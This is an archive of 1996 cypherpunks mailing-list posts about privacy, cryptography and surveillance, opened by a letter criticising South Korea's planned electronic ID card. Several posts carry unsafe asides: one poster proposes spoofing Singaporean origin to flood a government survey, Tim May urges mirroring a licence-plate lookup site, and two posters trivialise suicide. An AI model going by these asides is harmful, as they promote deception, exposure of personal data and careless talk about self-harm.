I would like to alarm you that another Big-Brother is coming with its most
ambitios dream in South Korea: The Electronic Identification Card, which
will be issued to every citizen as a mandatory within a year or so.

The Electronic Identification Card project is a part of South Korean
government's ultra-speed communication network building project. Managed by
the Ministry of Domestic Affairs, the US $413 million project is being
carried out in cooperation with the Korea Computer Institute. Once the
project is completed in 1997, every Koreans of 18 years or older will be
assigned a single integrated circuit (IC) card which will include photo
and all kinds of personal digitized information: current universal ID card
(currently every adult Korean has a photo ID issued by the Government),
driver's license, medical insurance card, national pension card, proof
of residence, and scanned fingerprints (!) among other things.
(I don't know how many "demoratic" governments are collecting fingerprints of
their whole citizens.)

DACOM, a big telecommunication company in Korea, which won the bidding
for the project, describes it as following:

"As 8,000 characters worth of information can be stored on the single
credit card-sized card, personal information needed for issuing official
documents and certificates can be accessed promptly by public offices,
institutions, companies, and banks or other organizations. The Ministry
of Domestic Affairs has announced that the new cards will be distributed
starting in January 1997. Full implementation is scheduled to be
completed by early 1998. While there are some nations in which drivers'
licenses are used in place of ID cards, this project will be the first
system in the world which combines multiple functions onto one card.
Once distribution is completed, the card will greatly boost efficiency,
saving the government US$1.3 billion and enabling it to eventually
reduce its work force by 5,000 employees."

(Quoted from: http://bora.dacom.co.kr/bora/dacom/news-clips.html)

As you can see, they have no concerns about protection of personal
information and privacy. True, they are a company making money from that
project, and probably we shouldn't expect any criticism against the Project.
The problem is, however, that almost all of the South Korean news media
are talking the same thing about it: the "efficiency" and the "convenience"
that the Electronic Identification Card might bring about.

I tried to find critical arguments against the project via a comprehensive
news data base in Korea, but I could not find any.  I also checked many web
sites of non-governmental organizations and socio-progressive groups in
Korea, but none of them have raised the issue yet. They do not seem to
realize the suspending dangers of their own privacy and human rights.
Despite obvious and serious danger in protecting personal information and
privacy , there is just no social discourse concerning the issue.

I have also checked relevant laws (especially newly approved
communication-related laws) through the database of the Korean
Government, but there seems to be no clear legal basis for the project. The
project has been mentioned only in the "10 Plans for Efficient National
Informatization," announced by the Ministry of Information and
Communication. But the City of Seoul already started to issue the Card
as a "test" in March. The Ministry of Domestic Affairs said, as they
were issuing the "test" version of the Card to 1,000 citizens, "we will
prepare relevant laws and regulations," implying that they are doing the
project "before" (and probably "above") the law.

Currently, I am writing columns and news stories for "Sisa Jouranl," the
weekly news magazine in South Korea, which decided to deal with the Card
project as a special topic as I suggested. To write a critical article
against the Project, I am starting to gather info about the similar cases,
if there is any. And I hope to hear from you about some theoretical and
practical knowledge about the similar issues; I would like to quote your
opinions in my article, if you allow me to do so.

Right after the publication of the news article, I will try to contact
various NGO's in South Korea to inform them of the importance of the issue.
And I will try to organize an anti-electronic ID Card movement in the
cyberspace, if that is necessary.

I am very happy to meet you in the cyberspace, who really concerns the
privacy issues in the computerized age.

Thank you very much.
Sincerely,
Joohan


******************************************
Joohoan Kim
Ph.D. Candidate
3620 Walnut Street
Annenberg School for Communication
University of Pennsylvania
Philadelphia, PA 19104
sjokim@icg.stwing.upenn.edu
http://www.cis.upenn.edu/~sjokim/home.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: It Is I Raksha Who Answer <raksha@brainlink.com>
Date: Thu, 8 Aug 1996 14:37:57 +0800
To: Anne Eisenberg <aeisenb@duke.poly.edu>
Subject: Re: FCPUNX:DoubleClick: Does is track browsing across multiple sites?
In-Reply-To: <199608072158.AA15664@dorsai.dorsai.org>
Message-ID: <Pine.SUN.3.91.960807192728.330B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 6 Aug 1996, Anne Eisenberg wrote:

> *Does anyone know whether DoubleClick really is tracking browsing patterns
> across multiple sites?  They claim to be able to do this; is it just
> advertising hype, or does anyone have knowledge of its actually doing so?
> Many thanks.
> 
> Anne Eisenberg
> aeisenb@duke.poly.edu

Hi Anne, nice to see you again. :-)

I was involved in the setup of the DoubleClick system while contracting
out to Poppe Tyson, who are partnered with them and located in the same
building. Poppe Tyson hosts many web sites for their advertising accounts.

When I was there, they were carrying T. Rowe Price; Chrysler; Pepsi; 
Siemens; Valvoline; LensCrafters; and the list goes on. Because the two
networks are located in the same building and the two firms working
together, it is very possible for DoubleClick to be able to scan the sites 
that poppe.com supports. 

--
                                ()()()()()   "The ubiquitous cut, the
    Self possession is   ]{      |BTCOMH|-|  exotic join..." -- J. Valley
 -=======================]O\\\{O | (tm) | |  "This life I LEAD! This job I
      9/10 of the law    ]{      |______|-|  *DO*! This...ENGLAND!" -- Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Aug 1996 14:39:16 +0800
To: frissell@panix.com
Subject: Re: Washington Post -- "Block but Verify"
Message-ID: <01I80894N1WU9JD2RG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frissell@panix.com"  "Duncan Frissell" 18-JUL-1996 06:17:23.58

>          57.  The CyberNOT list contains approximately 7000
>sites in twelve categories.  The software is designed to enable
>parents to selectively block access to any or all of the twelve
>CyberNOT categories simply by checking boxes in the Cyber Patrol
>Headquarters (the Cyber Patrol program manager).  These
>categories are:

>         Racism/Ethnic Impropriety:  Prejudice or discrimination
>          against any race or ethnic culture.  Ethnic or racist
>          jokes and slurs.  Any text that elevates one race over
>          another.

	In other words, if I say that there's something wrong with a culture
that doesn't encourage education (e.g., the "acting white" name-calling in
American lower-class black subcultures), the entire Cypherpunks list archives
would be banned by their standards by any parents who didn't want their
children seeing KKK literature? TCMay has also said things of that nature (and
I agree). This definition is way overly PC.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 8 Aug 1996 07:02:18 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: appropriate algorithm for application
In-Reply-To: <2.2.32.19960806232209.006e2c84@gonzo.wolfenet.com>
Message-ID: <3208DD65.237C228A@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Cerridwyn Llewyellyn wrote:
> 
> I need an algorithm/protocol that is capable of encrypting numerous
> files with separate keys, but there also needs to be a master key
> that will be able to decrypt all of them.  Is there such a system
> that is relatively secure?  I'd prefer the system to be as secure
> as possible, but in this application, security is secondary to
> functionality.  Thanks... //cerridwyn//

Are you after a working program, or just a design?

You could always use an escrowed public key generator (discussed on
sci.crypt some time ago), where the keys all have a factor of 'N'
embedded in 'N', but encrypted with the master key.

(I'd be prepared to write the code that generates the keys, if
someone does the "master decrypt" side of things).

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Marquardt <sam@wwa.com>
Date: Thu, 8 Aug 1996 15:50:28 +0800
To: "cypherpunks@toad.com>
Subject: RE: DoubleClick: Does is track browsing across multiple sites?
Message-ID: <01BB849E.E98494E0@pool12-010.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


Yo, some bozo subsribed me to this thing. Who's the administrator? I want off (no offense; I'm sure it's an interesting forum, but I don't like being mail-bombed by way of forgery). Whoever administers this thing, I'd be glad of a copy of the headers on the message that subscribed me.

Thanks --

Scott Marquardt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Aug 1996 15:57:18 +0800
To: cypherpunks@toad.com
Subject: New domains, Internic, etcetera
Message-ID: <01I809WUXS5S9JD2US@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Given previous discussion on here about Internic and their policies,
the below URLs may be of interest:

http://www.iiia.org/lists/newdom/
ftp://ietf.cnri.reston.va.us/internet-drafts/draft-postel-iana-itld-admin-01.txt

	The former is the list archive for a list discussing getting more
internet domains & equivalents of Internic.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Thu, 8 Aug 1996 14:45:20 +0800
To: cypherpunks@toad.com
Subject: Re: Corporate e-mail poli
Message-ID: <TCPSMTP.16.8.7.-12.51.0.2780269260.1222007@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


 * Carbons sent to: In: jims@mpgn.com

 -=> Quoting In:jims@mpgn.com to Harka <=-

 In> The whole question comes down to this:  
 In> Is a collection of words written from an employee to another
 In> individual property of the company when it was written, edited,
 In> and transmitted by company equipment.


I think, a 'collection of words', especially when exchanged on a personal level should be regarded as 'intellectual property' and thus should be protected from outsiders.
The technical means of physically creating (i.e. writing) and transmitting the words are secondary for above all they are thoughts, that are meant to be exchanged from one mind to another. It is too natural a thing to be subjected to invasion.

Harka

... Not tonight, dear.  I have a modem.
___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Thu, 8 Aug 1996 15:48:05 +0800
To: cypherpunks@toad.com
Subject: Re: Wee Beasties on Mars [NOISE]
In-Reply-To: <v02140b02ae2ebc31d032@[204.179.131.165]>
Message-ID: <rogerafw6ockb.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Jim McCoy <mccoy@communities.com> writes:

  > ... the most interesting fallout of this will be in
  > the creationism/evolution debate.  

Perhaps, but I doubt it.

  > It seems that life may have
  > been independantly generated at multiple locations, barring a
  > "space seed" debate flaring up again, and the "impossible odds"
  > argument has become pretty weak...

I doubt if it weakens the Creationists' stand, though.  After all, if
God created life on Earth, she could have created it anywhere else she
wanted, without having to ask permission of the inhabitants of the
"third rock from the sun".  [As you're no doubt aware, this has been,
in part, the premise of several moderately-successful SF novels.]

ObCrypto?  Are you kidding -- cryptogamology, maybe...

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 8 Aug 1996 14:57:23 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <199608071538.LAA08433@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.94.960807211650.23269B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 7 Aug 1996, Perry E. Metzger wrote:

> (Oh, and by the way, Dr. Hallam-Baker -- I consider suicide, which is
> counted in the HCI "statistics" on gun deaths, to be a perfectly
> legitimate use of a weapon. Its every person's right to off themselves
> any time they like by my way of thinking, and you have no right to
> force people to live against their will any more than you have the
> right to force them into slavery.)

Concur, as long as the estate is charged the cleaning bill.

If you off yourself with a gun, please put down plastic.
It's simple, it's effective, and it's considerate.

> 
> Perry
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 8 Aug 1996 16:13:36 +0800
To: cypherpunks@toad.com
Subject: Re: Public report of the EU crack.
Message-ID: <199608080520.WAA29193@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Hallam-Baker wrote:
>>I consider the political dimension of this affair to 
>>be more significant that the technical. This brings the
>>US and the French into the same category of anti-crypto
>>government with a habit of poking its nose into other
>>people business and getting caught.

Phill - do you know if the French ever got caught actively
breaking computers or telecomm equipment outside their country,
or have they only been hit for eavesdropping and breakins
on their subjects and foreigners within their boundaries?
It seems like the US government, if they really did this,
has gone a step beyond even France's level of tackiness,
as well as exceeding the "legitimate needs of law enforcement"
that Louis Freeh has been ranting about.  Is this some campaign
to reinforce Clinton's call for protecting the National Information
Infrastructure, or have they decided that voluntary key escrow
is too slow so they'll steal what they can now?

The technically interesting part is just that there are bugs
in routers and SNMP can be used to attack them.  We've seen
bugs before, and we've seen bugs used to bug people.


At 02:20 PM 8/5/96 -0700, drose@AZStarNet.com (David M. Rose) wrote:

>>
>>		Phill
>
>Say what?  John Young I can understand; this blather?
>
>Att: "Doc" Baker/Mr. Hyde, err, Hallam: any rudimentary text on
>diction/grammer/syntax might be helpful to you.
>
>Sheesh!  At least Sternlight seemed to be acquainted with the English language.
>

David - It's good form, if you _must_ flame people's spelling and
grammar on the net, to spell grammar correctly.
Understanding grammar well enough to recognize correct English
when you see it is a fine point mainly noticed by people whose
abilities run beyond the capability of running a spellchecker;
Phill's is fine (except a missing 's), if lacking JYA's obscure poetic touch.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 8 Aug 1996 14:52:19 +0800
To: jk@stallion.ee (Jüri Kaljundi)
Subject: Re: F2 hash?
In-Reply-To: <Pine.GSO.3.93.960808011718.28847G-100000@nebula.online.ee>
Message-ID: <199608080339.WAA17283@homeport.org>
MIME-Version: 1.0
Content-Type: text


=?ISO-8859-1?Q?J=FCri_Kaljundi?= wrote:

|  Wed, 7 Aug 1996 anonymous-remailer@shell.portal.com wrote:
| 
| > F2 is a secret hash from SecurityDynamics, and is used in
| > their client software.  (Its not the hash in the cards, but
| > if anyone has a copy of that, it might be fun.)
| 
| As I have to deal with SecurID tokens in the nearest future, I would like
| to hear more opinions about these cards. IMHO a proprietary algorithm like
| used in those cards is a bad thing and I would like an open approach much
| more, I still believe SecurID OTP cards are much better then usual
| passwords.

	I happen to run a mailing list, sdadmin, for folks to talk
about SDTI technologies.  Talk to majordomo@jabberwocky.bbnplanet.com.
There are a number of cards out there.  I've been looking at
CryptoCard & SNK recently, as well as V-One's smartmouse & virtual
smart card technologies. 

	I'd be very interested in seeing the algorithims come out,
especially F2.  I have a few attacks that look very nice on paper that
I'd like to try out.

| At Defcon this year they promised to tell about some security flaws in
| SecurID tokens, anyone know more about that?

	My understanding is that the guy who was going to give the
talk had nda difficulties.  Vin?  Did you make it out?  The talk was
going to be on race conditions, denial of service attacks, and the
like.


| Personally I believe that Security Dynamics should come out with some kind
| of new systems in the nearest future, now that they own RSA.=20

This should be interesting, if they can find people to make things
happen before 2000.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kickboxer <charlee@netnet.net>
Date: Thu, 8 Aug 1996 14:15:13 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <199608080343.WAA16449@netnet1.netnet.net>
MIME-Version: 1.0
Content-Type: text/plain


this really is not my mail (hey, isnt this a GREAT example of a SPAM?  keep
this for reference, so you can tell what other spams look like!)
                                                                               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 8 Aug 1996 16:37:15 +0800
To: Julian Assange <sandfort@crl.com (Sandy Sandfort)
Subject: Re: STEGO GUNS
Message-ID: <199608080544.WAA20087@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:28 AM 8/8/96 +1000, Julian Assange wrote:

>> 
>> 	The nationwide study [from the University of
>> 	Chicago] found that violent crime fell after
>> 	states made it legal to carry concealed handguns:
>> 	*   Homicide, down 8.5%.
>> 	*   Rape, down 5%.
>> 	*   Aggravated assault, down 7%.
>> 	...
>> 	The drop isn't primarily caused by people 
>> 	defending themselves with guns, says John Lott,
>> 	the study's author.  Rather, criminals seem to 
>> 	alter their behavior to avoid coming into contact
>> 	with a person who might have a gun.

>Correlation != causation. What are the figures on other crimes? I
>presume they would have to have gone up, since the criminal element has
>been deprived of it's "revenue" in this manner. Perhaps they simply
>didn't have time for killing, raping and assulting; being too busy
>lugging around their legally concealed handguns and pointing them at
>shop-keepers.

I think this is relevant, albeit in an indirect way, to cypherpunks.  We're 
all familiar with some of the various ways that government tries to justify 
intrusion based on arguments which look superficially plausible.  The 
nationwide 55 mph speed limit is one, which was first supported based on the 
claim that it saved gas, but later the justification changed to saving 
lives.  Yet recently studies have shown an actual decrease in accidents in 
states which raised the speed limit.  

The other big correlation (which turns out to be an anti-correlation!) is 
the idea that allowing people to carry concealed handguns leads to greater 
numbers of deaths.  By this study, that claim is shown to be false as well.

The reason this is all relevant is that cryptography is currently under 
attack by the US government, under the guise of ITAR, with the implicit 
claim that the availability of good crypto will somehow help "terrorists, 
drug dealers, child pornographers, and Jim Bell"  (oops!  sorry about that 
one...)

We, on the other hand, recognize that the advent of good cryptography will 
protect us far more than it might arguably harm us.  All of us on CP 
(except, probably, Sternlight) would gladly accept a world where 
unrestricted crypto is ubiquitous.

By showing previous examples of how government makes false claims and 
misuses (or ignores) statistics to support its actions, we can challenge any 
presumptions it makes regarding crypto.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 8 Aug 1996 14:57:53 +0800
To: peter.allan@aeat.co.uk (Peter M Allan)
Subject: Re: Anonymous Remailers at work
In-Reply-To: <9608071713.AA13368@clare.risley.aeat.co.uk>
Message-ID: <199608080410.XAA29450@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Peter M Allan wrote:
> > From: Bill Stewart <stewarts@ix.netcom.com>
> > I've recently run into a couple of business problems at work
> > that could be solved by (slightly modified) remailers.
> 
> > 1) Manager performance review, suggestion boxes, and questions to
> > visiting honchos - there are several departments that are using
> > "email to the secretary who'll take your name off and forward it"
> > to handle this problem.  Remailers are an obvious solution.

It is a little funny solution. What prevents me from writing five positive
performance reviews about myself, anonymizing them and sending to my boss?

What prevents someone from writing a very negative performance review
about someone else and forwarding it to their bosses (has been done
numerously:)?

A system analogous to anonymized voting may be useful in this case.
Simplified for a real-life office, it may be the following. Suppose we
have N workers. The secretary's program generates N random numbers and
publishes ONLY their SHA hash values. It also prints the numbers
themselves on separate pieces of paper. Secretary puts these pieces into
a hat so that the numbers are not visible.

Workers take one number each. Since they witness the procedure of taking
numbers they know that they have their anonymity.

Then they send the reviews of their peers to the management or publish
them in internal newsgroups, of course anonymously, attaching the 
numbers given to them for verification.

Since the list of checksums is (or may be) publicly known, there is
little way to cheat by double voting, and there is little way to find out
who wrote what.

Of course in their peer reviews workers should beware of using
cliches such as "Mr. X is a lying homosexual Sovok forger". :)

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Amnesia Anonymous Remailer <amnesia@chardos.connix.com>
Date: Thu, 8 Aug 1996 15:47:15 +0800
To: cypherpunks@toad.com
Subject: Re: PGP public key servers are NOT useful!
In-Reply-To: <199608071637.MAA08532@jekyll.piermont.com>
Message-ID: <199608080315.XAA28868@comet.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

> John Anonymous MacDonald writes:
> > The problem with the PGP public key servers is that
> > one has absolutely no control over what gets uploaded there in one's
> > own name.
> 
> Thats why people are supposed to use the web of trust to check the
> keys. You claim to make your key available by finger. How do you know
> that Mallet isn't switching the bits as they go down the wire to your
> correspondants? The only way to verify a key is to check known good
> signatures on it. Because of this, no security is needed on key
> storage facilities per se -- you aren't supposed to trust keys without
> signatures.
> 
> Geesh. I thought this was obvious. I guess not.
> 
> Perry

The web of trust just certifies that the key belongs to someone.  If
you'd read to the end of the message, you would have seen that I was
not complaining about the key certification process in PGP.  At issue is
NOT whether a key can be trusted to belong to someone, but whether or
not random people should be able to tag others' PGP keys with crap.

What I want to prevent is some person I dislike uploading his
signature on my key (particularly if he adds another ID to my key and
signs that).

How would you like it if I added a new ID to your key containing sort
of insult, certified that ID, and uploaded the new signature to the
key servers.  Alternatively, what if I uploaded 5 "vanity" keys in
your name to the PGP key servers.  Most software would download one
key, fail to certify the signature, and therefore not allow someone to
communicate with you even if that person could have verified your real
key.

I don't understand what the purpose of a centralized key server is,
when the owner of a public key should be the one to control what
certificates and tags are given out with his/her PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 8 Aug 1996 16:48:15 +0800
To: cypherpunks@toad.com
Subject: Oregon License Plate Site in the News Tonight!
Message-ID: <ae2ed55000021004bcce@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Cypherpunks make the news again.

I'm watching the LA NBC news channel, and they report that the Oregon "look
up any license plate" Web site is causing a flap. Though apparently legal,
the critics admit, the Governor wants the material removed.

(Sounds like a good time to mirror it on some other sites, pronto!)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 8 Aug 1996 18:23:38 +0800
To: cypherpunks@toad.com
Subject: Re: ****Tacoma, Washington Starts Taxing Internet Access
Message-ID: <ae2ed788010210044257@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:05 PM 8/7/96, James A. Donald wrote:
>At 05:08 AM 8/7/96 GMT, Brian C. Lane wrote:
>>  A slight correction. They are imposing a 6% tax on the Gross receipts of
>> all Internet Providers who have customers in Tacoma. This includes AOL,
>> Compu$erve, and my local favorites - aa.net and eskimo.com
>
>So if someone has six thousand customers, one of whom is in Tacoma, they
>want six percent of his gross on the other 5999 customers?

...and California wants 8.25%, Virgina wants 7.5%, ....., France wants 37%,
Iraq wants it all, and Singapore wants it shut down.

This is the flip side of regulatory arbitrage, I guess.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 8 Aug 1996 08:24:14 +0800
To: cypherpunks@toad.com
Subject: Re: Censorship through proxy
Message-ID: <1.5.4.32.19960807174810.002b773c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 18:12 06/08/96 -0700, Timothy C. May wrote:
>At 4:23 PM 8/6/96, Joel McNamara wrote:
>>http://www.singnet.com.sg/cache/sbareg.html
>
>Sing Sing (the country is now a prison, so...) is one of the states we
>should think about targetting for "special attention."

Yes, that would be great, and a trial run for the Big Prize, China.

At the site mentioned above, they have a form to fill out, which only
people from Singapore are supposed to respond to, which asks a 
lot of questions, including how much censorship users consider
appropriate! If there is some way of making them think the response
is coming from within Singapore when actually it isn't, maybe we 
could flood them with responses saying we want no censorship?

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 8 Aug 1996 17:34:11 +0800
To: cypherpunks@toad.com
Subject: Tim's Mac Tales
Message-ID: <199608072350.XAA09867@pipe6.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Finger your delete key: 
 
 
What caught my eye in Tim's remarks about Apple was his continued use of
Macs. Why was that enticing? 
 
 
It has to do with what hard-headed physicists know about hardware that
soft-headed coders don't. 
 
 
So my curiosity: does Tim know Intel intel that we don't know, and can't
tell it? More generally, do chip physicists know what crypto coders don't,
about the covert features of those world-pervasive chips inside? 
 
 
Would Tim tell, could Tim disclose intel, what the world doesn't know about
Intel, about what Intel's hard-headed Moore, the immigrant physicist,
whispers in utmost secrecy to Microsoft's soft-headed Gates, the
American-way coder? Is soft-hearted OS code the front for cold-hearted
hardware spying? 
 
 
Maybe the most that Tim can tell without exposing Intel is that Tim uses
Macs. 
 
 
Still, is Motorola more trustworthy than Intel, and if so, for whom? What
do Apple insiders know that the world needs to know about the deals of
Intel insiders, are they working with inside the Beltwayers, gobbling
world-markets, gobbling intel chip by chip? Is Motorola doing the same with
its adorable cellulars and satellites and boards and hardware galore, using
benign code to conceal hardware malice? 
 
 
Dreamy, maybe, but hard-hearted Tellers did it to the Oppenheimers, and
everyone knows that physicists truly enjoy playing dice with God. 
 
 
(Hold on, Tim, this is the way I write after thirty years of grinding out
grim technical reports.) 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 8 Aug 1996 18:04:09 +0800
To: cypherpunks@toad.com
Subject: Re: Tim's Mac Tales
Message-ID: <ae2ed87a020210047b34@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 PM 8/7/96, John Young wrote:

>What caught my eye in Tim's remarks about Apple was his continued use of
>Macs. Why was that enticing?

I have no idea why it would be enticing, inasmuch as I've covered this a
bunch of times. Though John is asking this as a joke, I'll pretend he's
serious. At least for a few paragraphs.

>It has to do with what hard-headed physicists know about hardware that
>soft-headed coders don't.

Amongst other things, an _operating system_ is not the same as a _CPU_. The
Macintosh OS happens to run, for historical reasons, on Motorola
processors, and DOS happens to run, for historical reasons, on Intel
processors. Other operatings systems, such as Unix, tend to run on various
processors.

Had history evolved slightly differently, a DOS-like OS could have been
dominant on Motorola CPUs, a Macintosh-like OS could have been dominant on
Intel CPUs (indeed, many would say this is what Windows 3.x and later are),
and so forth. Quibblers may jump in with the usual religious arguments
about segmented architectures, the orthogonality of the 68000 instruction
set, etc., but these points are tangential to the simple decisions about
Seattle Computer and Microsoft coming up with a CP/M-like OS for Intel
processors, and Apple committing to the Motorola family. (And recall that
windowing systems _did_ exist for the Intel CPU even back in the 80s...Unix
systems, including Sun's OS, ran on Intel CPUs.)

As several of my messages over the years have explained, including the one
sent out yesterday, the Macintosh visual metaphor was the closest to the
LISP machine I had been using while at Intel. I did buy an IBM PC in '83
(and an S-100 Sol in '78), running DOS. I even bought Windows 1.0, a truly,
totally, completely awful product! (Steve Ballmer of Microsoft admitted as
much in his interview on "Revenge of the Nerds.")

I looked closely at the Lisa in '83, but it was too expensive. The
Macintosh in '84 was priced better, but also lacked a few key things. But
by the time the Mac Plus arrived, I was ready to buy. That the CPU was a
$40 chip from Motorola rather than a $40 chip from Intel was not even a
consideration. (Intel bought Macs to do various graphics arts things, just
as I'm sure Motorola bought PCs to do various things.)

>
>So my curiosity: does Tim know Intel intel that we don't know, and can't
>tell it? More generally, do chip physicists know what crypto coders don't,
>about the covert features of those world-pervasive chips inside?

>
>Would Tim tell, could Tim disclose intel, what the world doesn't know about
>Intel, about what Intel's hard-headed Moore, the immigrant physicist,
>whispers in utmost secrecy to Microsoft's soft-headed Gates, the
>American-way coder? Is soft-hearted OS code the front for cold-hearted
>hardware spying?

I'm having my usual problems trying to parse this? Is this some sort of
rhyme, a la "a horse is a horse of course"?

Gordon Moore is not an immigrant physicist, not even an immigrant into
California. He was born about 40 miles north of where I now live.


>Maybe the most that Tim can tell without exposing Intel is that Tim uses
>Macs.

Indeed, I use Macs because Intel chips have those special NSA instructions
in them, like the Cray did. (Funny, we haven't had this thread here that I
can recall...it used to be a staple of sci.crypt in the late 80s.)

>
>(Hold on, Tim, this is the way I write after thirty years of grinding out
>grim technical reports.)
>

I suspected as much, John. Your TRs must be doozies. (TRP, he of The Whole
Sick Crew, used to hide from his officemates by placing a large sheet of
blueprint paper over his head as he did engineering drawing work at
Boeing.)

--Tyrone Slothrope






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 8 Aug 1996 15:11:01 +0800
To: cypherpunks@toad.com
Subject: Mondex security
Message-ID: <v0300782fae2f173dc847@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Thu, 08 Aug 1996 09:11:16 +0900
From: Yuji Sakata <sakata@open.rd.nttdata.jp>
To: www-buyinfo@allegra.att.com
Subject: Mondex security
Mime-Version: 1.0
Status: U

once,I asked you violation of Mondex security.
now ,I hear more information about this rumor.
it is very ambiguous info,
it is ..
Mondex ask some universities to try to violate Mondex IC card security
unofficialy.
and every univ can do that or show how to do that.
Mondex don't reveal this fact.
please give me some infomation about this rumor,if you know.

/// Yuji SAKATA(NTT Data Corporation)         ///
/// Voice:+81-3-5546-9571 Fax:+81-3-5546-9572 ///
/// E-mail:sakata@open.rd.nttdata.jp          ///


--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan <alano@teleport.com>
Date: Thu, 8 Aug 1996 18:17:41 +0800
To: "Timothy C. May" <tcmay@got.net>
